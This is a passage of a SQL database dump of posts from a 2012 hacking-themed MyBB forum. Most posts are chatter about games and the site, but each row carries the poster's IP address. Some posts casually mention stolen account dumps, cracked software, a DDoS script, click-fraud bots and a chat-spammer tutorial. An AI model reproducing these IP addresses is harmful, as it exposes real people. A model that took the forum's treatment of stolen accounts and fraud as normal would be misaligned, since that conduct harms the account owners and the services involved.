dateline=\'1350152442\']\nLOL. Ipwnaholic deleted his comment.\n[/quote]\n\nLOL no i didnt, also this is the wrong section for this anyways so it shouldnt even belong here.\n[/quote]\n\nPeople use PPD networks on youtube videos to help make more money, So yes This is in the right section. It can benefit any PPD marketer.', '99.253.94.204', '1677549260', '1', '0', '61', '1350156958', '1', 'fbf5cd819b5361506acd307b808d64c7', '0', '1350156958'); INSERT INTO mybb_posts VALUES('4515', '826', '4325', '7', 'RE: L33T Hacking Tinychat Room', '0', '82', 'iTzIpod', '1350157315', 'We got a Skype Group Chat instead.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8f6c7b3f0c213c047c63f0488e5937fe', '0', '0'); INSERT INTO mybb_posts VALUES('4516', '729', '3657', '7', 'RE: Skype Virus [MUST READ!]', '0', '82', 'iTzIpod', '1350157358', 'There was a way to delete this.\nMy friend told me how. But I forgot. \n\nSomething to do with %appdata% though.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fd8b6a7fc99627718959f44bc7a5bc05', '0', '0'); INSERT INTO mybb_posts VALUES('4517', '841', '4392', '71', 'RE: whats the best game ever made.', '0', '82', 'iTzIpod', '1350157390', 'Depends. Different people = different opinion.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4d3d65d2dd0a2a78d1f45fe2fd5c9431', '0', '0'); INSERT INTO mybb_posts VALUES('4518', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350157460', 'That\'s AdventureQuest you guys are talking about.\n\nThere is a new game out called\nAdventureQuest Worlds\n\n\nI would like to be a member :3 If you upgrade me, I\'ll love you <3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b830d5fe1973b32a3b97a958958c9f70', '0', '0'); INSERT INTO mybb_posts VALUES('4519', '569', '2813', '74', 'RE: 21,000 Minecraft Account Dump', '0', '82', 'iTzIpod', '1350157505', 'You\'re welcome. :D Glad to see someone saying thanks.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '19569b07f99c576cd7177c34f697652a', '0', '0'); INSERT INTO mybb_posts VALUES('4520', '428', '1942', '74', 'RE: Dark Steam | Free Steam Games', '0', '82', 'iTzIpod', '1350157556', 'Links may be broken.\nImages are broken.\nNo time to fix.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'eabe53ab31429507e8adc6eeab426efb', '0', '0'); INSERT INTO mybb_posts VALUES('4521', '619', '3008', '34', 'RE: [Photoshop CS5] How to make a logo', '0', '82', 'iTzIpod', '1350157604', 'Lool. You didn\'t even rep me -.-\n\n\nThanks for posting on it I guess..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0175bd87342112df05ed3d19a7cf615d', '0', '0'); INSERT INTO mybb_posts VALUES('4522', '847', '4425', '76', 'RE: add me on ps3', '0', '82', 'iTzIpod', '1350157635', 'You should add me on instead.\n\nI can only play on weekends though.\n\nPSN is in Signature.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c5e485463d622693021c03db3cf152a6', '0', '0'); INSERT INTO mybb_posts VALUES('4523', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '82', 'iTzIpod', '1350157694', 'I like PS3 way better. Reasons: It only does everything.\n;P', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '52f381addd238057252818c2f8d368a4', '0', '0'); INSERT INTO mybb_posts VALUES('4524', '517', '2564', '34', 'RE: Spiderman Signature Tutorial', '0', '82', 'iTzIpod', '1350157725', 'Not going to try this. I got no time.\n\nThanks Treyz.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '362dba092d3f2264132f05442ed7719b', '0', '0'); INSERT INTO mybb_posts VALUES('4525', '788', '4099', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '82', 'iTzIpod', '1350157785', 'I still got more posts than t3h jok3r?\n\nDang. I was gone for like 3 days.\n:p\nI can get like 100+ posts/day...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd7867aa9c6a2e7cd8b1489dc5ef2346a', '0', '0'); INSERT INTO mybb_posts VALUES('4526', '844', '4418', '73', 'RE: TEMPLE RUN CHEAT (UNLIMITED RUN)', '0', '82', 'iTzIpod', '1350157855', 'No.\nIt actually still works for me. :D\n\nYou\'re probably just doing it wrong?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '33a4b8b202403bdda4b8b35cce7da272', '0', '0'); INSERT INTO mybb_posts VALUES('4527', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1350157916', 'http://l33thacking.net/thread-190-page-9.html xD', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7cf44bb83aa27451cc0aad1bc2e7e803', '0', '0'); INSERT INTO mybb_posts VALUES('4528', '833', '4375', '3', 'RE: New feature coming up!', '0', '82', 'iTzIpod', '1350157946', 'Not looking forward to this feature. No.\nNo.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '63a8807e128fa9f085a85d16dd520363', '0', '0'); INSERT INTO mybb_posts VALUES('4529', '790', '4126', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1350157977', 'I\'m interested. :D Hook me up please.\nI just wanna see how my group is doing.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '837400416f866c3764a2845ad9bfcede', '0', '0'); INSERT INTO mybb_posts VALUES('4530', '790', '4126', '58', 'RE: Unique - Recruitment', '0', '62', 'R?????zo?', '1350158007', 'I\'ve added you to the group.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'e809eb363618bf8bb0ce971b5c884ee5', '0', '0'); INSERT INTO mybb_posts VALUES('4531', '849', '4468', '73', 'RE: when did you buy your ipod', '0', '82', 'iTzIpod', '1350158013', 'I bought my first Ipod in 2010.\nBut then I upgraded it each time a new one came out.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fd346ff9c8478361944187e0862d6fc0', '0', '0'); INSERT INTO mybb_posts VALUES('4532', '840', '4390', '4', 'RE: Its andrew', '0', '82', 'iTzIpod', '1350158069', 'Welcome to L33tHacking Andrew.\nEnjoy your stay here! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '302c9455551476c28bced6996700da3a', '0', '0'); INSERT INTO mybb_posts VALUES('4533', '854', '4510', '7', 'RE: Boasting thread', '0', '82', 'iTzIpod', '1350158101', 'Nice.\nHow did you do that though?!?!? -.- \n\nTeach me please!! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '555a6df42af36ac1e360e28658c383a7', '0', '0'); INSERT INTO mybb_posts VALUES('4534', '3', '4511', '19', 'RE: Official Site Rules', '0', '61', 'NXK', '1350159621', '[quote=\'??????????¢™\' pid=\'4511\' dateline=\'1350156197\']\n[quote=\'NXK\' pid=\'4504\' dateline=\'1350152885\']\nSo you copy and pasted Hack forums rules, Literally word for word.\n\nWow that doesn\'t make us look like a bunch of leechers.\n[/quote]\n\nThese rules are old when I was one of the first admins here, when this site first started.\n[/quote]\nThey\'re the exact same.. you just left some of HFs rules out.\n\nHack Forum Rules\n1. Members are not allowed to engage in threatening behavior toward other members. This includes flaming. Also threats to steal accounts, dox, or swat. This includes any on-site material such as posts, PMs, or profiles. \n2. No short, low quality posts like \"bump\", \"lol\", \"roflmao\", \"thanks\" and any repeated characters to defeat the min character count.\n3. Don\'t attempt to infect members with trojans, viruses, or backdoors.\n4. No direct links to infected downloads in posts or profiles.\n5. No posting of personal information that isn\'t yours. Privacy is to be respected here. This includes any passwords, logins or dumps.\n6. Signature images can be no larger than 650x200 pixels and 500k size. Animated gifs should not be annoying.\n7. You cannot ask for or offer reputation in posts, signatures, or PM. This includes encouragement like \"rep is appreciated\".\n8. No adult images, adult links, or adult account trading.\n9. Multiple accounts will not be allowed unless you are reporting your original account as hacked. Ban evading will result in the permanent closing of your old account and new accounts. No exceptions.\n10. Advertising of competing sites is not allowed. This refers to any website with a hacker forum that\'s similar to HF. Websites without forums or forums unrelated to hacking are acceptable. Advertising includes signatures, PMs, profiles, and posts.\n11. No posting of fake programs.\n12. No threads or posts for donation begging. This includes loan requests.\n13. All blackhat hacking activity listed on that linked page is forbidden.\n14. Read the violations for profile policies and rules in that help doc.\n15. No political or religious expression in your profile. This includes user titles, signatures, and avatars.\n16. We do not allow site goals or achievements in signature this includes but not limited to posts, reps, upgrades, and groups memberships. \n17. Any rules posted in the forums header must also be reviewed. Some forums have special policies that must be adhered to. Don\'t post in any forum without reading them.\n18. Any marketplace type threads must be in the Marketplace area. A one month ban is the penalty for wrong forum posting marketplace threads. No warning will be given. \n\nWord for word.', '99.253.94.204', '1677549260', '1', '0', '61', '1350164576', '1', 'c94c1e7c393208ce8478a312361bc1fe', '0', '1350164576'); INSERT INTO mybb_posts VALUES('4535', '833', '4528', '3', 'RE: New feature coming up!', '0', '61', 'NXK', '1350159825', '[quote=\'iTzIpod\' pid=\'4528\' dateline=\'1350157946\']\r\nNot looking forward to this feature. No.\r\nNo.\r\n[/quote]\r\nThis, People are going to abuse this and people who are going to try and spread on here are going to abuse this.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'de6f663592dbf385f96d37457bd13e45', '0', '0'); INSERT INTO mybb_posts VALUES('4536', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '254', 'Greed', '1350160563', 'lol maybe, I gotta save for a new ps3. If i have money left over I can do it.', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '865ab4d552f8880e267e699c9e1ba771', '0', '0'); INSERT INTO mybb_posts VALUES('4537', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '254', 'Greed', '1350160624', 'lol short and sweet and true', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '466fbccdc895d6efba1568034a198ebb', '0', '0'); INSERT INTO mybb_posts VALUES('4538', '3', '7', '19', 'RE: Official Site Rules', '0', '62', 'R?????zo?', '1350160904', 'we only have 14 though, someone failing at math ? :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '03cdfa58832cc787efe819f817a50ba7', '0', '0'); INSERT INTO mybb_posts VALUES('4539', '854', '4510', '7', 'RE: Boasting thread', '0', '53', 'sirchamp', '1350161121', 'Now I have 45 Dollars :D\nThis new method I bought is amazing. I bought the method for 6 Dollars hehe.', '90.155.23.2', '1520113410', '1', '0', '0', '0', '1', '58437603cd8d46bc739d9dd7df1631a4', '0', '0'); INSERT INTO mybb_posts VALUES('4540', '844', '4418', '73', 'RE: TEMPLE RUN CHEAT (UNLIMITED RUN)', '0', '257', 'XxTREYZxX', '1350163058', 'yeah it still works and it is a cheat because it does somthing that gives the benifit', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '7b678cd641ea3c7adfb195f7aae1aa96', '0', '0'); INSERT INTO mybb_posts VALUES('4541', '3', '4538', '19', 'RE: Official Site Rules', '0', '3', '??????????¢™', '1350163397', '[quote=\'R?????zo?\' pid=\'4538\' dateline=\'1350160904\']\r\nwe only have 14 though, someone failing at math ? :P\r\n[/quote]\r\n\r\nI took some of them out so how am I failing math?', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '0a3a716c6cb3c77bf596a026a5669f40', '0', '0'); INSERT INTO mybb_posts VALUES('4542', '841', '4392', '71', 'RE: whats the best game ever made.', '0', '257', 'XxTREYZxX', '1350163398', 'umm whats your i kinda try and get people to tell me their Favorite game .thanks', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '0f563f9f011d382818b95e25e008a742', '0', '0'); INSERT INTO mybb_posts VALUES('4543', '846', '4420', '74', 'RE: another great pvp', '0', '257', 'XxTREYZxX', '1350163700', 'yeah sorry about this thread guys', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', 'b360ba95a85b499eab43aebde2f8b03a', '0', '0'); INSERT INTO mybb_posts VALUES('4544', '833', '4493', '3', 'RE: New feature coming up!', '0', '232', 'BreShiE', '1350164258', '[quote=\'R?????zo?\' pid=\'4493\' dateline=\'1350151518\']\r\nWow that sounds nice, hopefully doesnt make the hosting server lag though.\r\n[/quote]\r\n\r\nIt won\'t affect the performance of the server.', '78.149.81.254', '1318408702', '1', '0', '0', '0', '1', '0e2ddb77e60a3c33c70d5d692d4aeb92', '0', '0'); INSERT INTO mybb_posts VALUES('4545', '833', '4375', '3', 'RE: New feature coming up!', '0', '62', 'R?????zo?', '1350164357', 'Alright looking foward to see that then.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'ff03cf902deeb48fd5246f8e4ef12918', '0', '0'); INSERT INTO mybb_posts VALUES('4546', '3', '4538', '19', 'RE: Official Site Rules', '0', '61', 'NXK', '1350164548', '[quote=\'R?????zo?\' pid=\'4538\' dateline=\'1350160904\']\r\nwe only have 14 though, someone failing at math ? :P\r\n[/quote]\r\nYou clearly didn\'t read what I said before I listed HFs rules.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '829da87b703ed56c236951dd3ae2348b', '0', '0'); INSERT INTO mybb_posts VALUES('4547', '855', '0', '74', 'need a minecraft account (premium)', '0', '257', 'XxTREYZxX', '1350165520', 'hey i was just wondering if anyone coould give me a minecraft premium \\thanks hope you enjoy.', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', '00a64a6c59ca10a8a5056dfa5539c766', '0', '0'); INSERT INTO mybb_posts VALUES('4548', '854', '4539', '7', 'RE: Boasting thread', '0', '61', 'NXK', '1350165580', '[quote=\'sirchamp\' pid=\'4539\' dateline=\'1350161121\']\r\nNow I have 45 Dollars :D\r\nThis new method I bought is amazing. I bought the method for 6 Dollars hehe.\r\n[/quote]\r\n\r\nLucky man :)\r\n\r\nI only have like 1$ made on adf.ly aha.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '524d6ca9efe4efc8d43583261200e6db', '0', '0'); INSERT INTO mybb_posts VALUES('4549', '3', '7', '19', 'RE: Official Site Rules', '0', '205', 'mothered', '1350165914', 'Perhaps you should also Include the Importance of an online virus scan report, when contributing files via one\'s own file hosting site.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '45f0bae57fe03da56316e8c8c080a8d8', '0', '0'); INSERT INTO mybb_posts VALUES('4550', '840', '4390', '4', 'RE: Its andrew', '0', '205', 'mothered', '1350168177', 'Welcome aboard mate.\r\n\r\nEnjoy :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'e7b3ea5b7e272f20f74412ddc1cbd758', '0', '0'); INSERT INTO mybb_posts VALUES('4551', '832', '4370', '25', 'RE: [News] Windows 8 security flaw', '0', '205', 'mothered', '1350168391', 'I already have the RTM Installed and activated, with no Issues thus far.\r\n\r\nI\'m sure there\'ll be a security fix provided with Windows Update, or via Microsoft\'s site.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '7e149b37cf3ced60617034744e9c1e75', '0', '0'); INSERT INTO mybb_posts VALUES('4552', '3', '7', '19', '[Junk]Official Site Rules', '0', '1', 't3h jok3r', '1350169128', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('4553', '790', '4126', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1350170152', 'Thank you :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e6f842f23d6b2ba9aca56baf479458c4', '0', '0'); INSERT INTO mybb_posts VALUES('4554', '792', '4137', '61', 'RE: Unique - Rules [PLEASE READ]', '0', '82', 'iTzIpod', '1350170218', 'Seems very nice. Keep it up Reloadzor.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '97b17312154770b84b51431c41c2d290', '0', '0'); INSERT INTO mybb_posts VALUES('4555', '812', '4261', '61', 'RE: Skype resolvers [WEB BASED]', '0', '82', 'iTzIpod', '1350170251', 'Didn\'t I post this?\nI forgot :/ \n\nOh well. Nice share!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '03acdca08bd2c548e1a1fc9daf0dfd7a', '0', '0'); INSERT INTO mybb_posts VALUES('4556', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350170296', '[align=center]\n:3\n\nThanks though hoping I can get Membership\n\nMe.\nTook a quick SS.\nSorry if it looks really horrible. :p\n\n[img]http://i.imgur.com/daCI6.png[/img]\n\nEDIT: Here\'s another one.\nHopefully this is a better one :p\n\n\n[img]http://i.imgur.com/xotpj.png[/img]\n\n[img]http://i.imgur.com/bFuyb.png[/img]\n[img]http://i.imgur.com/iue2D.png[/img]\n[img]http://i.imgur.com/OJP6a.png[/img]\n[img]http://i.imgur.com/Ijh9d.png[/img]\n[img]http://i.imgur.com/BX87P.png[/img]\n\nhttp://www.aq.com/aw-character.asp?id=iTziPod\n\n[img]http://i.imgur.com/aBy3q.png[/img]\n[img]http://i.imgur.com/mijVP.png[/img]\n[img]http://i.imgur.com/RbBxG.png[/img]\n[/align]', '24.212.197.164', '416597412', '1', '0', '82', '1350171590', '1', '238c0075dabcc16de54c11dfa495e465', '0', '1350171590'); INSERT INTO mybb_posts VALUES('4557', '844', '4418', '73', 'RE: TEMPLE RUN CHEAT (UNLIMITED RUN)', '0', '82', 'iTzIpod', '1350170366', 'I left it on overnight once :3\n+ I charged my iPod\nDang.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3c4d452efb6c062c464a2d61c4f4f87a', '0', '0'); INSERT INTO mybb_posts VALUES('4558', '855', '4547', '74', 'RE: need a minecraft account (premium)', '0', '82', 'iTzIpod', '1350170418', 'PM Me then I\'ll reply back to your PM. Don\'t worry. I got some accounts.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7dce8e0b748a1fc53b922b991c581bd9', '0', '0'); INSERT INTO mybb_posts VALUES('4559', '840', '4390', '4', 'RE: Its andrew', '0', '253', 'GlowingCapes', '1350170422', 'Welcome to LH! I\'m also new, and I love it here so far. Enjoy your stay!', '173.76.159.245', '-1387487243', '0', '0', '0', '0', '1', '520f440e37790f7ce53694ed2db05be8', '0', '0'); INSERT INTO mybb_posts VALUES('4560', '854', '4510', '7', 'RE: Boasting thread', '0', '82', 'iTzIpod', '1350170449', 'I only made $2 :/\nAnd that\'s all I ever made :/\n\nShare that method with me please :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f962ddebcd3cc6c8d36f171ac6f467ba', '0', '0'); INSERT INTO mybb_posts VALUES('4561', '845', '4430', '72', 'RE: whats better ps3 or xbox', '0', '253', 'GlowingCapes', '1350170665', 'I\'m a 360 user, and I like PS3 more. The only thing I like about 360 is the controller and some games you can\'t get on the PS3. I hate paying for Live...\r\n\r\n[quote=\'XTr3ME PiX3L\' pid=\'4430\' dateline=\'1350119317\']\r\nXBOX 360 ALL THE WAY!!!\r\n\r\nIts MUCH easier to pirate games on it , Nowadays games cost like over a 100 dollars and i don\'t want to waste that much money.\r\n[/quote]\r\n\r\nNew games don\'t cost $100+ unless it\'s CoD\'s LE (Limited Edition) games with other stuff in it. 90% of new games are $50-60 new.', '173.76.159.245', '-1387487243', '0', '0', '0', '0', '1', 'a5bbb9c3e4228153c1f4fbf25565a2cd', '0', '0'); INSERT INTO mybb_posts VALUES('4562', '841', '4392', '71', 'RE: whats the best game ever made.', '0', '253', 'GlowingCapes', '1350170840', 'Different game styles and different games. So, there\'s not really a \"Best Game Ever Made.\"\n\n\nBut.. mine\'s NHL 12 and Minecraft at the moment for favotire games though.', '173.76.159.245', '-1387487243', '0', '0', '0', '0', '1', '6a84c634c6c32a60c11e00fbc2d3925a', '0', '0'); INSERT INTO mybb_posts VALUES('4563', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '2', 'Apathy', '1350173306', 'That looks like dragon fable^^^', '173.206.177.91', '-1378963109', '0', '0', '0', '0', '1', '9a340fc33791c7a9b4482eecf5b48da8', '0', '0'); INSERT INTO mybb_posts VALUES('4564', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350173862', 'Yeah.\nBut DragonFable sucks in my opinion.\nI also used a bot for that too :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '41bb5e1bb9080fff8fb832117d1a137f', '0', '0'); INSERT INTO mybb_posts VALUES('4565', '829', '4564', '74', 'RE: Adventure Quest Worlds', '0', '2', 'Apathy', '1350174516', '[quote=\'iTzIpod\' pid=\'4564\' dateline=\'1350173862\']\r\nYeah.\r\nBut DragonFable sucks in my opinion.\r\nI also used a bot for that too :3\r\n[/quote]\r\n\r\nShould I try this new game?', '173.206.177.91', '-1378963109', '0', '0', '0', '0', '1', '4e719ea5eb76758c9259e1393615a66d', '0', '0'); INSERT INTO mybb_posts VALUES('4566', '856', '0', '42', 'Anonymous Project Mayhem 2012 | Dangerous Idea #1 / Leak it ALL!', '0', '61', 'NXK', '1350174607', '[video=youtube]http://www.youtube.com/watch?feature=player_embedded&v=QK71cUa7nnw[/video]\n\nDiscuss?\nhttp://anonnews.org/press/item/1783/', '99.253.94.204', '1677549260', '1', '0', '61', '1350174627', '1', 'dc5a1cf21293e722d14484cb95791377', '0', '1350174627'); INSERT INTO mybb_posts VALUES('4567', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '3', '??????????¢™', '1350177832', 'I say the xbox 360 is better than the PS3.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '02052a9658e4900b9d0ba3b62a109780', '0', '0'); INSERT INTO mybb_posts VALUES('4568', '856', '4566', '42', 'RE: Anonymous Project Mayhem 2012 | Dangerous Idea #1 / Leak it ALL!', '0', '3', '??????????¢™', '1350178161', 'Whoa that is a crazy idea.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'f503ba7be39cf9c5604fbfdaa8942e73', '0', '0'); INSERT INTO mybb_posts VALUES('4569', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '257', 'XxTREYZxX', '1350183610', 'good work fellow L33T people this thread is really turning out to be great :)', '203.104.11.5', '-882373883', '1', '0', '0', '0', '1', '3978cc43c058dd64295e900e6aa9f42a', '0', '0'); INSERT INTO mybb_posts VALUES('4570', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350183799', 'Not really new. But sure. I don\'t see why not.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'db90d19a633c4cbe442b51c430bb4c11', '0', '0'); INSERT INTO mybb_posts VALUES('4571', '855', '4547', '74', 'RE: need a minecraft account (premium)', '0', '257', 'XxTREYZxX', '1350184047', 'i cant pm you because its full or somehting', '203.104.11.8', '-882373880', '1', '0', '0', '0', '1', '43976f92b9adf627313a0d37a15bcbeb', '0', '0'); INSERT INTO mybb_posts VALUES('4572', '856', '4566', '42', 'RE: Anonymous Project Mayhem 2012 | Dangerous Idea #1 / Leak it ALL!', '0', '257', 'XxTREYZxX', '1350184565', 'what this is the craziest ever.', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', 'a62d987c14f881257adae7c315db583f', '0', '0'); INSERT INTO mybb_posts VALUES('4574', '702', '3593', '35', 'RE: You guys like my new userbar?', '0', '257', 'XxTREYZxX', '1350186704', 'its pretty mad keep up the good work', '203.104.11.5', '-882373883', '1', '0', '0', '0', '1', '6e7c8d41f95bd5a706195c367efef970', '0', '0'); INSERT INTO mybb_posts VALUES('4575', '138', '355', '35', 'RE: Make Cool Logo in just 20 sec....[HOT]', '0', '257', 'XxTREYZxX', '1350186774', 'this is nice i might try it out', '203.104.11.6', '-882373882', '1', '0', '0', '0', '1', '8323913c2ccc38e544a38c1cff770548', '0', '0'); INSERT INTO mybb_posts VALUES('4576', '854', '4510', '7', 'RE: Boasting thread', '0', '222', 'Exposé', '1350191131', 'Haha this is so much bullshit....11,000 clicks...your gonna get banned :sir:', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '6362587781dc8f9b394ad04d58695823', '0', '0'); INSERT INTO mybb_posts VALUES('4577', '788', '4480', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '1', 't3h jok3r', '1350193944', '[quote=\'XxTREYZxX\' pid=\'4480\' dateline=\'1350133110\']\r\nyeah LQ this is our home\r\ni love this community in the most homo-ess way ever\r\n[/quote]\r\n\r\nAre you calling L33T Hacking low quality?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '81b1ca84282d8beb332ec3de5de47fd6', '0', '0'); INSERT INTO mybb_posts VALUES('4578', '821', '4294', '28', 'RE: What\'s on your mind or what are your future plans?', '0', '1', 't3h jok3r', '1350194065', 'Lol Greed.\n\nOT: I\'m thinking if I should drink water now or after I\'m done checking my emails.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5a198c7881eb2008baddc908e0088c6b', '0', '0'); INSERT INTO mybb_posts VALUES('4579', '849', '4468', '73', 'RE: when did you buy your ipod', '0', '1', 't3h jok3r', '1350194100', 'Me too, I upgrade my Ipod the next day after it\'s release.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '43c95293961b9fa5ac4c219df4367a28', '0', '0'); INSERT INTO mybb_posts VALUES('4580', '792', '4137', '61', 'RE: Unique - Rules [PLEASE READ]', '0', '62', 'R?????zo?', '1350194745', 'I will add you to Co-Leader, hopefully jok3r sees this and can give you mod to the forums aswell.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '8981ef518852441477006d9ed9d6bdf4', '0', '0'); INSERT INTO mybb_posts VALUES('4581', '857', '0', '73', 'another great app on the Ipod', '0', '257', 'XxTREYZxX', '1350199816', 'hey L33T,\n{THIS IS NOT APART OF MY SERIES}\nand today i\'m going to show you a great app on the app store.\nthe app is appoday. this great app gives you a free app everyday which you would have to pay. hoped you enjoy this great app.\nbye L33T.', '203.104.11.12', '-882373876', '1', '0', '257', '1350200386', '1', 'd4cc369d6c8edbe6b44f7c3e74e8f8b9', '0', '1350200386'); INSERT INTO mybb_posts VALUES('4582', '858', '0', '73', 'A new series', '8', '257', 'XxTREYZxX', '1350200278', 'Hey L33T, \nAnd today i\'m going to be talking about my new series i\'m going to be doing, its called {THAT GREAT APP}. and i\'m going to be introducing a new great app every day and some basic info about the app. hope you enjoy this series i will finishing this series when there is no great games on the app store. i\'m out XxTREYZxX', '203.104.11.12', '-882373876', '1', '0', '257', '1350200322', '1', '810be92121db65c76d41ba8e6bd599a1', '0', '1350200322'); INSERT INTO mybb_posts VALUES('4583', '788', '4099', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '222', 'Exposé', '1350200319', 'I think he meant to say LH....LMAO...simmer down joker', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '5242a3d83941438e44f081175a5e1049', '0', '0'); INSERT INTO mybb_posts VALUES('4586', '496', '2408', '14', 'RE: Free Proxy List', '0', '257', 'XxTREYZxX', '1350200973', 'thanks for these they will come in handy hehe lol \nemailed you.', '203.104.11.3', '-882373885', '1', '0', '0', '0', '1', 'e28169faa19fe8752b37e79ff0cd8335', '0', '0'); INSERT INTO mybb_posts VALUES('4585', '496', '2408', '14', 'RE: Free Proxy List', '0', '1', 't3h jok3r', '1350200786', 'Downloaded it now. Using this on my adfly bot. Thanks', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2fcdf9f6d5fff4460ec7227a883d9ef5', '0', '0'); INSERT INTO mybb_posts VALUES('4587', '836', '4385', '30', 'RE: Internet Download Manager [IDM] v6.12.22 + crack + skin', '0', '1', 't3h jok3r', '1350201080', 'Thanks sharing and moved to the right section.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '20555fa9f3b6f4396a7c167edc7a3b48', '0', '0'); INSERT INTO mybb_posts VALUES('4588', '854', '4510', '7', 'RE: Boasting thread', '0', '53', 'sirchamp', '1350201480', 'perhaps. I did this method before and I got paid out, now Im doing it the second time.', '164.52.9.75', '-1540093621', '1', '0', '0', '0', '1', '2b6abe9b2c0509dcc0cc273cd0d6365d', '0', '0'); INSERT INTO mybb_posts VALUES('4589', '854', '4510', '7', 'RE: Boasting thread', '0', '1', 't3h jok3r', '1350201650', 'I\'m sure you are doing delayed clicks otherwise 10K clicks under an hour guarantee ban. Now when it comes to soo many clicks it\'s either bots or a website right?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '078726d770fc04c19d21034439092bac', '0', '0'); INSERT INTO mybb_posts VALUES('4590', '841', '4392', '71', 'RE: whats the best game ever made.', '0', '53', 'sirchamp', '1350201733', 'COD!!! All of them. They are great :D', '29.35.13.91', '488836443', '1', '0', '0', '0', '1', '8422f790de470743e50239ad53087387', '0', '0'); INSERT INTO mybb_posts VALUES('4591', '819', '4292', '68', 'RE: PHP DDoS Script', '0', '8', 'spacefish36', '1350201837', 'Coolio thanks for this. I was looking for this for a very long time I even gav up hope lol', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'a4bf3608883080be8f5b4f8d4caf240c', '0', '0'); INSERT INTO mybb_posts VALUES('4592', '859', '0', '7', 'Absence for 4 days', '0', '53', 'sirchamp', '1350201920', 'Hey guys\r\n\r\nToday Im going to austria to a wellness hotel for 4 days. So I\'ll be back at wednesday. \r\n\r\nHave a good time on the forum ^^', '83.141.158.163', '1401790115', '1', '0', '0', '0', '1', 'fb7ca106e489906f5af48d2413b43b5f', '0', '0'); INSERT INTO mybb_posts VALUES('4593', '860', '0', '52', '[tut] Creating a chat spammer', '0', '8', 'spacefish36', '1350202099', 'Ever wondered how to create a chat spammer? Find out how today!\r\n\r\nStart by creating a new “Windows Form Application”.\r\n\r\nOnce you do this, open up the toolbox and drag the following into the form:\r\n\r\n[list]\r\n[*]A Timer\r\n[*]2 Buttons\r\n[*]1 Textbox\r\n[/list]\r\nAnd rearrange them how you please.\r\nOpen the properties for the button you want to use as the start button and type in the “Text” box, “Start” or “Start Spam”, etc.\r\n\r\nThen, open the properties for the button you want to use as the stop button and type in the “Text” box, “Stop” or “Stop Spam”, etc.\r\nOnce this is done, return to the Form. Double click the start button and enter the 